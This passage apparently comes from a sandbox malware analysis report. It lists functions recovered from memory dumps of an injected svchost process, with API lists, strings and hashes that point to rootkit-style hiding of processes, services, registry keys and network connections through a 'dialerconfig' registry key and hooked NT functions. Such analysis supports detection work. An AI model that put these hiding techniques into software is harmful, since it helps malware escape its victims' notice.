                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: a64a8fafea4748a103742ffd9067c0c0469601ae63dc2b93c66a8a842f97a94b
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 67319332258F809AEB60CFA5E8817EE73A1F789759F540115EA9E83B54DF3AC145CB40
                                                        Function 000001CBD8BD1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 19dde69792006792dc4b80681f5feac67894e51617c30498e9630f35d049b7da
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 7A713936758B1099FB119FE5E8D2AA96365F784B8EF006111DA4F87B29DF37C544C380
                                                        Function 000001CBD8BD12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 4748ce0690830c0898785a435476f9b8f0d028ed3fb3b1bc3ab9656b80b8c298
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 96516E32248B84CAF755CFE2E4857AAB7A1F789B9AF044124DA4E47719DF3EC045CB40
                                                        Function 000001CBD8BD1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: e634467b1f32646224c8287f2fc796e93386f02fba06a326c16b56ff7ceecbf6
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: A6318474589B8AA4FA05DBE9E8D3EF46326A70434EF845013941F86166AFBBC24DC3D0
                                                        Function 000001CBD8BA6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 1cbd8ba6910-1cbd8ba6916 203 1cbd8ba6918-1cbd8ba691b 202->203 204 1cbd8ba6951-1cbd8ba695b 202->204 205 1cbd8ba6945-1cbd8ba6984 call 1cbd8ba6fc0 203->205 206 1cbd8ba691d-1cbd8ba6920 203->206 207 1cbd8ba6a78-1cbd8ba6a8d 204->207 225 1cbd8ba698a-1cbd8ba699f call 1cbd8ba6e54 205->225 226 1cbd8ba6a52 205->226 208 1cbd8ba6938 __scrt_dllmain_crt_thread_attach 206->208 209 1cbd8ba6922-1cbd8ba6925 206->209 210 1cbd8ba6a9c-1cbd8ba6ab6 call 1cbd8ba6e54 207->210 211 1cbd8ba6a8f 207->211 217 1cbd8ba693d-1cbd8ba6944 208->217 213 1cbd8ba6927-1cbd8ba6930 209->213 214 1cbd8ba6931-1cbd8ba6936 call 1cbd8ba6f04 209->214 223 1cbd8ba6ab8-1cbd8ba6aed call 1cbd8ba6f7c call 1cbd8ba6e1c call 1cbd8ba7318 call 1cbd8ba7130 call 1cbd8ba7154 call 1cbd8ba6fac 210->223 224 1cbd8ba6aef-1cbd8ba6b20 call 1cbd8ba7190 210->224 215 1cbd8ba6a91-1cbd8ba6a9b 211->215 214->217 223->215 236 1cbd8ba6b31-1cbd8ba6b37 224->236 237 1cbd8ba6b22-1cbd8ba6b28 224->237 234 1cbd8ba69a5-1cbd8ba69b6 call 1cbd8ba6ec4 225->234 235 1cbd8ba6a6a-1cbd8ba6a77 call 1cbd8ba7190 225->235 230 1cbd8ba6a54-1cbd8ba6a69 226->230 252 1cbd8ba6a07-1cbd8ba6a11 call 1cbd8ba7130 234->252 253 1cbd8ba69b8-1cbd8ba69dc call 1cbd8ba72dc call 1cbd8ba6e0c call 1cbd8ba6e38 call 1cbd8baac0c 234->253 235->207 242 1cbd8ba6b39-1cbd8ba6b43 236->242 243 1cbd8ba6b7e-1cbd8ba6b94 call 1cbd8ba268c 236->243 237->236 241 1cbd8ba6b2a-1cbd8ba6b2c 237->241 248 1cbd8ba6c1f-1cbd8ba6c2c 241->248 249 1cbd8ba6b45-1cbd8ba6b4d 242->249 250 1cbd8ba6b4f-1cbd8ba6b5d call 1cbd8bb5780 242->250 263 1cbd8ba6b96-1cbd8ba6b98 243->263 264 1cbd8ba6bcc-1cbd8ba6bce 243->264 255 1cbd8ba6b63-1cbd8ba6b78 call 1cbd8ba6910 249->255 250->255 267 1cbd8ba6c15-1cbd8ba6c1d 250->267 252->226 275 1cbd8ba6a13-1cbd8ba6a1f call 1cbd8ba7180 252->275 253->252 305 1cbd8ba69de-1cbd8ba69e5 __scrt_dllmain_after_initialize_c 253->305 255->243 255->267 263->264 272 1cbd8ba6b9a-1cbd8ba6bbc call 1cbd8ba268c call 1cbd8ba6a78 263->272 265 1cbd8ba6bd5-1cbd8ba6bea call 1cbd8ba6910 264->265 266 1cbd8ba6bd0-1cbd8ba6bd3 264->266 265->267 284 1cbd8ba6bec-1cbd8ba6bf6 265->284 266->265 266->267 267->248 272->264 299 1cbd8ba6bbe-1cbd8ba6bc6 call 1cbd8bb5780 272->299 292 1cbd8ba6a45-1cbd8ba6a50 275->292 293 1cbd8ba6a21-1cbd8ba6a2b call 1cbd8ba7098 275->293 289 1cbd8ba6bf8-1cbd8ba6bff 284->289 290 1cbd8ba6c01-1cbd8ba6c11 call 1cbd8bb5780 284->290 289->267 290->267 292->230 293->292 304 1cbd8ba6a2d-1cbd8ba6a3b 293->304 299->264 304->292 305->252 306 1cbd8ba69e7-1cbd8ba6a04 call 1cbd8baabc8 305->306 306->252
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 07fdd0c7d24b3d781066f053deca9409dd143e813ed5482003d316b44598c601
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 7881D3B178C7018AFA909BE594C3BF92290EB5678EF4440159A4FC3796DBBBC845C788
                                                        Function 000001CBD8BDCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 309 1cbd8bdce28-1cbd8bdce4a GetLastError 310 1cbd8bdce69-1cbd8bdce74 FlsSetValue 309->310 311 1cbd8bdce4c-1cbd8bdce57 FlsGetValue 309->311 314 1cbd8bdce76-1cbd8bdce79 310->314 315 1cbd8bdce7b-1cbd8bdce80 310->315 312 1cbd8bdce59-1cbd8bdce61 311->312 313 1cbd8bdce63 311->313 316 1cbd8bdced5-1cbd8bdcee0 SetLastError 312->316 313->310 314->316 317 1cbd8bdce85 call 1cbd8bdd6cc 315->317 318 1cbd8bdcef5-1cbd8bdcf0b call 1cbd8bdc748 316->318 319 1cbd8bdcee2-1cbd8bdcef4 316->319 320 1cbd8bdce8a-1cbd8bdce96 317->320 332 1cbd8bdcf28-1cbd8bdcf33 FlsSetValue 318->332 333 1cbd8bdcf0d-1cbd8bdcf18 FlsGetValue 318->333 322 1cbd8bdcea8-1cbd8bdceb2 FlsSetValue 320->322 323 1cbd8bdce98-1cbd8bdce9f FlsSetValue 320->323 324 1cbd8bdcec6-1cbd8bdced0 call 1cbd8bdcb94 call 1cbd8bdd744 322->324 325 1cbd8bdceb4-1cbd8bdcec4 FlsSetValue 322->325 327 1cbd8bdcea1-1cbd8bdcea6 call 1cbd8bdd744 323->327 324->316 325->327 327->314 335 1cbd8bdcf98-1cbd8bdcf9f call 1cbd8bdc748 332->335 336 1cbd8bdcf35-1cbd8bdcf3a 332->336 338 1cbd8bdcf1a-1cbd8bdcf1e 333->338 339 1cbd8bdcf22 333->339 340 1cbd8bdcf3f call 1cbd8bdd6cc 336->340 338->335 341 1cbd8bdcf20 338->341 339->332 344 1cbd8bdcf44-1cbd8bdcf50 340->344 345 1cbd8bdcf8f-1cbd8bdcf97 341->345 346 1cbd8bdcf62-1cbd8bdcf6c FlsSetValue 344->346 347 1cbd8bdcf52-1cbd8bdcf59 FlsSetValue 344->347 349 1cbd8bdcf80-1cbd8bdcf8a call 1cbd8bdcb94 call 1cbd8bdd744 346->349 350 1cbd8bdcf6e-1cbd8bdcf7e FlsSetValue 346->350 348 1cbd8bdcf5b-1cbd8bdcf60 call 1cbd8bdd744 347->348 348->335 349->345 350->348
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001CBD8BDCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCEBC
                                                        • SetLastError.KERNEL32 ref: 000001CBD8BDCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001CBD8BDECCC,?,?,?,?,000001CBD8BDBF9F,?,?,?,?,?,000001CBD8BD7AB0), ref: 000001CBD8BDCF2C
                                                          • Part of subcall function 000001CBD8BDD6CC: HeapAlloc.KERNEL32 ref: 000001CBD8BDD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF54
                                                          • Part of subcall function 000001CBD8BDD744: HeapFree.KERNEL32 ref: 000001CBD8BDD75A
                                                          • Part of subcall function 000001CBD8BDD744: GetLastError.KERNEL32 ref: 000001CBD8BDD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CBD8BE0A6B,?,?,?,000001CBD8BE045C,?,?,?,000001CBD8BDC84F), ref: 000001CBD8BDCF76
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 380e374fd0efe43d558c039f956dcbd27f9d5249dad7ecb7c9ae31faf30a61ac
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 06413C702CD34462F96967F595E3BF922539B447AEF141B24A83FC67E6EB2BD401C280
                                                        Function 000001CBD8BD2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 8d495f9292460a9735da5ed95210fda6fbe957da3286c33244c8f36ea02638a3
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 52219032258B508AF710CBA4E4857A963A1F3857AAF400215DA5E82BA8CF3EC149CB40
                                                        Function 000001CBD8BA9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 454 1cbd8ba9944-1cbd8ba99ac call 1cbd8baa814 457 1cbd8ba9e13-1cbd8ba9e1b call 1cbd8babb48 454->457 458 1cbd8ba99b2-1cbd8ba99b5 454->458 458->457 459 1cbd8ba99bb-1cbd8ba99c1 458->459 461 1cbd8ba99c7-1cbd8ba99cb 459->461 462 1cbd8ba9a90-1cbd8ba9aa2 459->462 461->462 466 1cbd8ba99d1-1cbd8ba99dc 461->466 464 1cbd8ba9d63-1cbd8ba9d67 462->464 465 1cbd8ba9aa8-1cbd8ba9aac 462->465 469 1cbd8ba9d69-1cbd8ba9d70 464->469 470 1cbd8ba9da0-1cbd8ba9daa call 1cbd8ba8a34 464->470 465->464 467 1cbd8ba9ab2-1cbd8ba9abd 465->467 466->462 468 1cbd8ba99e2-1cbd8ba99e7 466->468 467->464 472 1cbd8ba9ac3-1cbd8ba9aca 467->472 468->462 473 1cbd8ba99ed-1cbd8ba99f7 call 1cbd8ba8a34 468->473 469->457 474 1cbd8ba9d76-1cbd8ba9d9b call 1cbd8ba9e1c 469->474 470->457 480 1cbd8ba9dac-1cbd8ba9dcb call 1cbd8ba6d40 470->480 476 1cbd8ba9c94-1cbd8ba9ca0 472->476 477 1cbd8ba9ad0-1cbd8ba9b07 call 1cbd8ba8e10 472->477 473->480 488 1cbd8ba99fd-1cbd8ba9a28 call 1cbd8ba8a34 * 2 call 1cbd8ba9124 473->488 474->470 476->470 481 1cbd8ba9ca6-1cbd8ba9caa 476->481 477->476 492 1cbd8ba9b0d-1cbd8ba9b15 477->492 485 1cbd8ba9cba-1cbd8ba9cc2 481->485 486 1cbd8ba9cac-1cbd8ba9cb8 call 1cbd8ba90e4 481->486 485->470 491 1cbd8ba9cc8-1cbd8ba9cd5 call 1cbd8ba8cb4 485->491 486->485 498 1cbd8ba9cdb-1cbd8ba9ce3 486->498 521 1cbd8ba9a2a-1cbd8ba9a2e 488->521 522 1cbd8ba9a48-1cbd8ba9a52 call 1cbd8ba8a34 488->522 491->470 491->498 496 1cbd8ba9b19-1cbd8ba9b4b 492->496 500 1cbd8ba9c87-1cbd8ba9c8e 496->500 501 1cbd8ba9b51-1cbd8ba9b5c 496->501 504 1cbd8ba9df6-1cbd8ba9e12 call 1cbd8ba8a34 * 2 call 1cbd8babaa8 498->504 505 1cbd8ba9ce9-1cbd8ba9ced 498->505 500->476 500->496 501->500 506 1cbd8ba9b62-1cbd8ba9b7b 501->506 504->457 507 1cbd8ba9cef-1cbd8ba9cfe call 1cbd8ba90e4 505->507 508 1cbd8ba9d00 505->508 509 1cbd8ba9c74-1cbd8ba9c79 506->509 510 1cbd8ba9b81-1cbd8ba9bc6 call 1cbd8ba90f8 * 2 506->510 518 1cbd8ba9d03-1cbd8ba9d0d call 1cbd8baa8ac 507->518 508->518 514 1cbd8ba9c84 509->514 535 1cbd8ba9c04-1cbd8ba9c0a 510->535 536 1cbd8ba9bc8-1cbd8ba9bee call 1cbd8ba90f8 call 1cbd8baa038 510->536 514->500 518->470 533 1cbd8ba9d13-1cbd8ba9d61 call 1cbd8ba8d44 call 1cbd8ba8f50 518->533 521->522 526 1cbd8ba9a30-1cbd8ba9a3b 521->526 522->462 539 1cbd8ba9a54-1cbd8ba9a74 call 1cbd8ba8a34 * 2 call 1cbd8baa8ac 522->539 526->522 531 1cbd8ba9a3d-1cbd8ba9a42 526->531 531->457 531->522 533->470 543 1cbd8ba9c7b 535->543 544 1cbd8ba9c0c-1cbd8ba9c10 535->544 554 1cbd8ba9c15-1cbd8ba9c72 call 1cbd8ba9870 536->554 555 1cbd8ba9bf0-1cbd8ba9c02 536->555 559 1cbd8ba9a76-1cbd8ba9a80 call 1cbd8baa99c 539->559 560 1cbd8ba9a8b 539->560 545 1cbd8ba9c80 543->545 544->510 545->514 554->545 555->535 555->536 564 1cbd8ba9a86-1cbd8ba9def call 1cbd8ba86ac call 1cbd8baa3f4 call 1cbd8ba88a0 559->564 565 1cbd8ba9df0-1cbd8ba9df5 call 1cbd8babaa8 559->565 560->462 564->565 565->504
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: a62b4a5be1d7a59fcf86fd4f7d53b3e4fe5156bf132faf2773fff64dd797c087
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 49E19C32648B408AFB608BE5D482BFD37A0F745B8DF100106EE9E87B96CB76C094C784
                                                        Function 000001CBD8BDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 575 1cbd8bda544-1cbd8bda5ac call 1cbd8bdb414 578 1cbd8bdaa13-1cbd8bdaa1b call 1cbd8bdc748 575->578 579 1cbd8bda5b2-1cbd8bda5b5 575->579 579->578 580 1cbd8bda5bb-1cbd8bda5c1 579->580 582 1cbd8bda5c7-1cbd8bda5cb 580->582 583 1cbd8bda690-1cbd8bda6a2 580->583 582->583 587 1cbd8bda5d1-1cbd8bda5dc 582->587 585 1cbd8bda6a8-1cbd8bda6ac 583->585 586 1cbd8bda963-1cbd8bda967 583->586 585->586 588 1cbd8bda6b2-1cbd8bda6bd 585->588 590 1cbd8bda969-1cbd8bda970 586->590 591 1cbd8bda9a0-1cbd8bda9aa call 1cbd8bd9634 586->591 587->583 589 1cbd8bda5e2-1cbd8bda5e7 587->589 588->586 593 1cbd8bda6c3-1cbd8bda6ca 588->593 589->583 594 1cbd8bda5ed-1cbd8bda5f7 call 1cbd8bd9634 589->594 590->578 595 1cbd8bda976-1cbd8bda99b call 1cbd8bdaa1c 590->595 591->578 601 1cbd8bda9ac-1cbd8bda9cb call 1cbd8bd7940 591->601 598 1cbd8bda894-1cbd8bda8a0 593->598 599 1cbd8bda6d0-1cbd8bda707 call 1cbd8bd9a10 593->599 594->601 609 1cbd8bda5fd-1cbd8bda628 call 1cbd8bd9634 * 2 call 1cbd8bd9d24 594->609 595->591 598->591 602 1cbd8bda8a6-1cbd8bda8aa 598->602 599->598 613 1cbd8bda70d-1cbd8bda715 599->613 606 1cbd8bda8ba-1cbd8bda8c2 602->606 607 1cbd8bda8ac-1cbd8bda8b8 call 1cbd8bd9ce4 602->607 606->591 612 1cbd8bda8c8-1cbd8bda8d5 call 1cbd8bd98b4 606->612 607->606 620 1cbd8bda8db-1cbd8bda8e3 607->620 643 1cbd8bda648-1cbd8bda652 call 1cbd8bd9634 609->643 644 1cbd8bda62a-1cbd8bda62e 609->644 612->591 612->620 617 1cbd8bda719-1cbd8bda74b 613->617 622 1cbd8bda887-1cbd8bda88e 617->622 623 1cbd8bda751-1cbd8bda75c 617->623 624 1cbd8bda8e9-1cbd8bda8ed 620->624 625 1cbd8bda9f6-1cbd8bdaa12 call 1cbd8bd9634 * 2 call 1cbd8bdc6a8 620->625 622->598 622->617 623->622 626 1cbd8bda762-1cbd8bda77b 623->626 628 1cbd8bda900 624->628 629 1cbd8bda8ef-1cbd8bda8fe call 1cbd8bd9ce4 624->629 625->578 630 1cbd8bda874-1cbd8bda879 626->630 631 1cbd8bda781-1cbd8bda7c6 call 1cbd8bd9cf8 * 2 626->631 639 1cbd8bda903-1cbd8bda90d call 1cbd8bdb4ac 628->639 629->639 635 1cbd8bda884 630->635 656 1cbd8bda7c8-1cbd8bda7ee call 1cbd8bd9cf8 call 1cbd8bdac38 631->656 657 1cbd8bda804-1cbd8bda80a 631->657 635->622 639->591 654 1cbd8bda913-1cbd8bda961 call 1cbd8bd9944 call 1cbd8bd9b50 639->654 643->583 660 1cbd8bda654-1cbd8bda674 call 1cbd8bd9634 * 2 call 1cbd8bdb4ac 643->660 644->643 648 1cbd8bda630-1cbd8bda63b 644->648 648->643 653 1cbd8bda63d-1cbd8bda642 648->653 653->578 653->643 654->591 675 1cbd8bda815-1cbd8bda872 call 1cbd8bda470 656->675 676 1cbd8bda7f0-1cbd8bda802 656->676 664 1cbd8bda80c-1cbd8bda810 657->664 665 1cbd8bda87b 657->665 681 1cbd8bda676-1cbd8bda680 call 1cbd8bdb59c 660->681 682 1cbd8bda68b 660->682 664->631 666 1cbd8bda880 665->666 666->635 675->666 676->656 676->657 685 1cbd8bda686-1cbd8bda9ef call 1cbd8bd92ac call 1cbd8bdaff4 call 1cbd8bd94a0 681->685 686 1cbd8bda9f0-1cbd8bda9f5 call 1cbd8bdc6a8 681->686 682->583 685->686 686->625
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: f93e4a1daa0d78cdaddb0cd674ab4af90492db7ec0da77687cb0fc27551b55aa
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 2DE18D72648B40AAFB209FE59482BED77A2F74479DF141115DE8F97B96CB3AC081C780
                                                        Function 000001CBD8BDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 696 1cbd8bdf394-1cbd8bdf3e6 697 1cbd8bdf4d7 696->697 698 1cbd8bdf3ec-1cbd8bdf3ef 696->698 701 1cbd8bdf4d9-1cbd8bdf4f5 697->701 699 1cbd8bdf3f9-1cbd8bdf3fc 698->699 700 1cbd8bdf3f1-1cbd8bdf3f4 698->700 702 1cbd8bdf402-1cbd8bdf411 699->702 703 1cbd8bdf4bc-1cbd8bdf4cf 699->703 700->701 704 1cbd8bdf413-1cbd8bdf416 702->704 705 1cbd8bdf421-1cbd8bdf440 LoadLibraryExW 702->705 703->697 706 1cbd8bdf516-1cbd8bdf525 GetProcAddress 704->706 707 1cbd8bdf41c 704->707 708 1cbd8bdf4f6-1cbd8bdf50b 705->708 709 1cbd8bdf446-1cbd8bdf44f GetLastError 705->709 712 1cbd8bdf527-1cbd8bdf54e 706->712 713 1cbd8bdf4b5 706->713 710 1cbd8bdf4a8-1cbd8bdf4af 707->710 708->706 711 1cbd8bdf50d-1cbd8bdf510 FreeLibrary 708->711 714 1cbd8bdf496-1cbd8bdf4a0 709->714 715 1cbd8bdf451-1cbd8bdf468 call 1cbd8bdc928 709->715 710->702 710->713 711->706 712->701 713->703 714->710 715->714 718 1cbd8bdf46a-1cbd8bdf47e call 1cbd8bdc928 715->718 718->714 721 1cbd8bdf480-1cbd8bdf494 LoadLibraryExW 718->721 721->708 721->714
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 32bd6cb2b4fe6735583b648f74334685912bda2f5fa339ee11d04b3235dc61ab
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 3041133239DB01A5FA12CBD6A881BF52792FB45BAAF0441258D0FD7795EB3BC405C380
                                                        Function 000001CBD8BD104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 066eb5fd8941bfc650680b4864ba2459917eed432ccf800f44e515a7831a054b
